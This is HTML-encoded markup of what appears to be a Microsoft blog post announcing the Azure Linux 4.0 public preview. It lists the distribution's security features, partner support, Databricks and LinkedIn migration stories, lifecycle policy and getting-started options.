&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux for WSL will be available shortly after Build.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Secure by Default, Backed by Microsoft&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Security is not an add-on in Azure Linux; it's foundational. &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;Built with security in mind from day one&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;, Azure Linux applies defense-in-depth from the kernel through to the supply chain. A reduced package footprint means fewer vulnerabilities to manage, and Microsoft's ownership of the full supply chain enables fast-track CVE response.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt; Below is a summary of security capabilities that you should expect to see in Azure Linux at the time of general availability.&lt;/SPAN&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Capability&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Details&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Secure Boot &amp;amp; Trusted Launch&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Signed shim, GRUB, kernel, and systemd-boot.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;SELinux&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Supported on all images. Enforcing by default.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;FIPS 140-3&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Certification in progress. Built-in crypto module support.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Kernel hardening&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;ASLR, stack protection, seccomp, systemd service sandboxing.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Supply chain security&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;All packages and repos cryptographically signed. SBOMs published.&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Identity&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Entra ID SSH support.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:259}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;CVE response&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Microsoft-owned supply chain enables fast-track Critical/High CVE patches.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Lifecycle&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;LTS kernels maintained for lifetime of the distribution.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:259}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Day-1 Ecosystem Partner Support&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux already has validated support from a broad ecosystem of security, monitoring, networking, and data partners via AKS and VM support:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="6" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Dynatrace — Application performance monitoring and observability&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="6" data-aria-level="1"&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;Aquasec – database platform support&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="12" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Qualys — Vulnerability management, compliance scanning, and asset inventory&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="12" data-aria-level="1"&gt;Isovalent — eBPF-powered networking, security, and observability via Cilium&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{}"&gt; &lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="12" data-aria-level="1"&gt;Elastic — Log analytics, infrastructure monitoring, and SIEM/XDR&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{}"&gt; &lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="12" data-aria-level="1"&gt;Upwind — Runtime cloud security and behavioral threat detection&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{}"&gt; &lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="12" data-aria-level="1"&gt;SAP — Enterprise workload certification for S/4HANA and NetWeaver&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{}"&gt; &lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="12" data-aria-level="1"&gt;Databricks — Data and AI platform powering lakehouse workloads at scale&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{}"&gt; &lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="12" data-aria-level="1"&gt;Arm — Native Arm64 architecture support for cost-efficient cloud compute&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Proven at Scale&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux isn't new; it has been running production workloads at massive scale across Azure's internal services and early adopters.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux has been powering production workloads at massive scale since 2022 across AKS, Azure SQL, Azure Cosmos DB, and other core Azure services along with LinkedIn and Databricks. With version 4.0, we're building on that proven foundation with a modernized stack, expanded compute surface support, and a new Fedora-derived base, bringing the same reliability our internal services depend on every Azure customer.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Databricks&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Databricks migrated over 100,000 VMs and more than 1 million CPU cores to Azure Linux with &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;zero customer-facing incidents&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;. The migration eliminated separate hardened images by leveraging Azure Linux's built-in FIPS support and delivered measurable performance gains: &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;27% faster image pull times&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; and approximately &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;5% faster query execution&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; across their serverless compute fleet.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;LinkedIn&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;LinkedIn completed a major stack upgrade, migrating to Azure Linux 3 across their infrastructure. The transition enabled adoption of configuration as code and modern kernel integration, resulting in a more resilient, secure, and future-proof environment. LinkedIn's Grid team reported significant performance improvements following the migration.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Predictable Lifecycle and Updates&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Patch faster. Operate simpler.&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; Azure Linux follows a clear, predictable lifecycle designed for teams running large Azure fleets:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="19" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;LTS kernel&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; - Maintained with monthly CVE backports.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="20" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;HWE kernels&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; - Introduced annually for new hardware platforms, GPU, and AI accelerator enablement.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="21" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Predictable updates&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; - Packages (language runtimes, tools) are refreshed in predictable windows. Between windows, only critical/high CVE patches are backported.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="22" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Monthly security updates&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; - Predictable cadence for all supported packages.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;For full details on the lifecycle model, kernel tracks, and package tiers, see the &lt;A class="lia-external-url" href="http://aka.ms/azurelinux-lifecyle" target="_blank" rel="noopener"&gt;Azure Linux Release Cadence and Lifecycle documentation&lt;/A&gt;.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Get Started&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux 4.0 is available now in public preview. Choose the path that fits your workload:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Scenario&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;How to Start&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Virtual Machines&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Deploy from Azure Marketplace via Portal, CLI, ARM, Bicep, or Terraform&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Kubernetes Service [Not available at Preview]&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Set --os-sku to AzureLinux when creating a node pool&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Container Images&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Pull from Microsoft Container Registry (MCR)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;WSL [Not available at Preview]&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;wsl --install -d AzureLinux&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Learn More&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="23" data-aria-level="1"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;&lt;SPAN data-teams="true"&gt;//Build Session: &lt;A href="https://build.microsoft.com/en-US/sessions/OD827?source=sessions" target="_blank" rel="noopener" aria-label="Link Build, deploy, and run Linux workloads on Azure"&gt;Build, deploy, and run Linux workloads on Azure&lt;/A&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="23" data-aria-level="1"&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/azure-linux/intro-azure-linux" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Azure Linux documentation&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="23" data-aria-level="1"&gt;To learn more and get started, visit&amp;nbsp;&lt;A class="lia-external-url" href="http://aka.ms/AzureLinuxProduct" target="_blank" rel="noopener"&gt;aka.ms/AzureLinuxProduct&lt;/A&gt;&lt;/LI&gt;
